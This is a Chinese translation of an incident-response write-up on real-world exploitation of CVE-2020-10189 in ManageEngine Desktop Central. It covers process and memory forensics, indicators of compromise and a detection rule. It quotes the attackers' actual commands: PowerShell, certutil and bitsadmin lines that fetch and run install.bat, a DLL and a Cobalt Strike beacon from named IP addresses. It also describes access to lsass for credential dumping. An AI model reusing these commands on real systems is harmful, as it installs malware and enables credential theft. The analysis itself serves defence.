0x01漏洞披露在研究DesktopCentral漏洞的过程中,我们在推特上发现了一位研究员在2020年3月5日披露了DesktopCentral漏洞的帖子。Central的RCE漏洞。ZohoManageEngineDesktopCentral10允许远程代码执行。该漏洞是由FileStorage类的getChartImage中的非信任数据反序列化造成的。该漏洞与CewolfServlet和MDMLogUploaderServletServlet相关。对CVE-2020-10189的研究还表明,可以在Shodan上搜索易受攻击的DesktopCentral服务器。图2-可在Shodan上搜索的易受攻击的DesktopCentral服务器在公共网络上发现的威胁是一个可疑的PowerShell下载目录,其中包含下载文件的说明。最早的威胁活动之一是一些可疑的PowerShell下载命令。此命令包含将install.bat和storesyncsvc.dll下载到C:\Windows\Temp的说明,然后立即执行install.bat(图3)。cmd/cpowershell$client=new-objectSystem.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell$client=new-objectSystem.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.batesktopCentral服务器RCE漏洞现场攻击分析图3-可疑的PowerShell下载命令install.bat脚本包含将storesyncsvc.dll作为服务安装在系统上的指令。(图4)。图4-Install.bat的内容运行PowerShell命令后,我们观察到安装了一个新服务,服务名称为StorSyncSvc,显示名称为StorageSyncService(图5)。图5-安装StorageSync对ServiceVirusTotal的查询显示,一些检测引擎将storesyncsvc.dll归类为恶意软件。https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details0x02进程跟踪识别漏洞利用该RCE漏洞于2020年3月5日通过推特披露。查看SysmonC处理事件可知:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe进程是负责执行PowerShell下载命令的进程(图6)。图6-ParentImage负责下载PowerShell查看内存中的进程,我们还观察到DesktopCentraljava.exe应用程序cmd.exe和2.exe之间的父/子进程关系(图7)。图7-java.exe父/子进程关系0x03利用文件系统识别漏洞利用CVE-2020-10189漏洞在这个易受攻击的系统上运行代码。通过文件系统时间线分析,我们确定文件名为_chart(图8)和logger.zip(图9)的系统上可能发生了遍历文件写入。图8-_chart文件系统分析图9-logger.zip文件系统分析这些文件名也在@Steventseeley发布的POC中引用(图10)。图10-引用POC中的_chart和logger.zip,参考:https://srcincite.io/pocs/src-2020-0011.py.txt0x04引入系统命令在后续进程创建日志中,cmd.exe使用certutil。exe命令下载并执行2.exe(图11),进一步分析可知,2.exe极有可能是C2工具CobaltStrike的一部分。cmd/ccertutil-urlcache-split-fhttp://91.208.184.78/2.exe&&2.exe图11-Certutil命令OSINT显示2.exe已被VirusTotal上的多个检测引擎识别为恶意软件:https://www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/details利用app.any.run沙箱(图12)和恶意软件的内存分析,进一步证实了2.exe承载CobaltStrikeBeacon负载的可能性。图12-2.exe判断为恶意软件https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c0eb44d8571c233a74b6进一步支持2.exe在其他几种可能的恶意软件签名中的理论(图13)。图13-Yarascan扫描结果使用Volatility的恶意插件,我们确定了几个可能有代码注入迹象的内存部分。我们对另一个被malfind转储的内存段进行了yara扫描,进一步证实了我们的猜想。整个过程可以在下面的记录中看到(图14)。(完整流程见原文)图14-Yarascan验证结果我们随后检查了malfind的输出以寻找代码注入的证据,并在其中识别出可疑的内存段svchost.exe(图15)。OSINT研究让我们找到了一位研究人员,他对恶意软件进行了逆向工程,并找到了负责向其中注入代码的svchost.exe部分(图16)。图15-包含注入代码的svchost分析图16-显示可能注入功能的@VK_Intel分析参考:攻击结束后,我们观察到来自66.42.96.220可疑端口12345的包含install.bat的恶意Bitsadmin命令执行传输指令。我们的分析师观察到bitsadmin命令在DesktopCentral服务器上运行,其中包含相同的IP地址、端口和在PowerShell下载命令中调用的相同install.bat文件(图17)。cmd/cbitsadmin/transferbbbbhttp://66.42.98.220:12345/test/install.batC:\Users\Public\install.bat图17-Bitsadmin命令0x05访问凭证我们还观察到潜在的凭证访问活动。攻击者用来执行凭据转储的一种常用技术是使用恶意进程(SourceImage)访问另一个进程(TargetImage),最常见的目标是lsass.exe,因为它通常包含敏感信息,例如帐户凭据。在这里,我们观察到SourceImage2.exe访问TargetImagelsass.exe(图18)。CobaltStrikeBeacon包含一个类似于Mimikatz的原生凭证转储功能。使用此功能的唯一要求是攻击者具有SYSTEM权限。以下事件提供了充分的证据表明凭据访问具有高风险。图18-2.exe访问lsass.exe在分析此入侵期间,我们向EricZimmerman的KAPE工具添加了一些收集目标功能,以将相关日志添加到分类工作中。工具地址:https://binaryforay.blogspot.com/2019/02/introducing-kape.html相关日志使用示例:kape.exe--tsourceC:--tdestc:\temp\tout--tflush--targetManageEngineLogsSigmaFlorian该项目的roth创建了一个签名来检测攻击者利用的一些技术:https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml发现基于命令行的检测进程创建日志中的活动将很有价值:ParentImage|endswith:'DesktopCentral_Server\jre\bin\java.exe'CommandLine|contains:'*powershell*''*certutil*''*bitsadmin*'0x06IOCs·Storesyncsvc.dll·MD5:5909983db4d9023e4098e56361c96a6f·SHA256:f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c·Install.bat·MD5:7966c2c546b71e800397a67f942858d0·SHA256:de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc·2.exe·MD5:3e856162c36b532925c8226b4ed3481c·SHA256:d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309·66[.]42[.]98[.]220·91[.]208[.]184[.]78·74[.]82[.]201[.]8本文翻译自:https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle如有转载请注明原文地址
